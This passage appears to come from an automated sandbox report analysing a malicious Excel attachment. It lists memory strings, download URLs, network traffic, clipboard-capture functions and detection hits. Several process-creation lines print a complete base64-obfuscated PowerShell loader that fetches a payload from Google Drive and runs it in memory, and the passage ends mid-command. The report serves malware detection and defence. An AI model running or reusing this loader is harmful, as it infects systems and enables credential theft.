Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: CasPol.exe, 0000002A.00000002.502030748.000000000018C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/k
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: CasPol.exe, 0000001F.00000002.512443413.00000000003A4000.00000004.00000010.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.519745743.00000000001AF000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/
Source: mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/)
Source: mshta.exe, 00000010.00000002.463992817.000000000037E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 545714677889Materiale.xls, 7B130000.0.dr	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain
Source: mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain-v
Source: mshta.exe, 00000004.00000002.412317283.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainD4
Source: mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainG4
Source: mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainI
Source: mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainJ4
Source: mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainZ4
Source: mshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainyX
Source: mshta.exe, 00000004.00000003.406433145.000000000017E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain~4
Source: mshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/O
Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/d
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/koE
Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/p
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 0000000F.00000002.480727505.0000000002552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Source: powershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Source: bhv417.tmp.31.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: CasPol.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: CasPol.exe, 0000001F.00000002.516164879.000000000216A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.516435437.000000000220A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523035849.0000000002159000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523294829.00000000021FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: CasPol.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443

Source: unknown	HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

31_2_0041183A

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	31_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	31_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	41_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	41_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	42_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	42_2_004072B5

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

Too many similar processes found

Source: CasPol.exe

Process created: 40

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: A & C Metrology OC 545714677889Materiale.xls	OLE: Microsoft Excel 2007+
Source: A & C Metrology OC 545714677889Materiale.xls	OLE: Microsoft Excel 2007+
Source: ~DFE74F55484018A372.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 7B130000.0.dr	OLE: Microsoft Excel 2007+
Source: 7B130000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcn